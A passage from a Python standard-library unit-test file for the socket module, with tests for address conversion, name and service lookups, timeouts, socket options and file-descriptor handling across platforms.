self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS has no appropriate service (TBD?)')
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if sys.platform != 'OpenVMS':
# OpenVMS has no http service
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
@unittest.skipIf(sys.platform in ("OpenVMS"), "-= it hangs =-")
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
@unittest.skipIf(sys.platform in ("OpenVMS"), "-= it fails =-")
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if sys.platform != 'OpenVMS' and hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaisesRegex(TypeError, "integer argument expected"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaisesRegex(TypeError, "integer is required"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
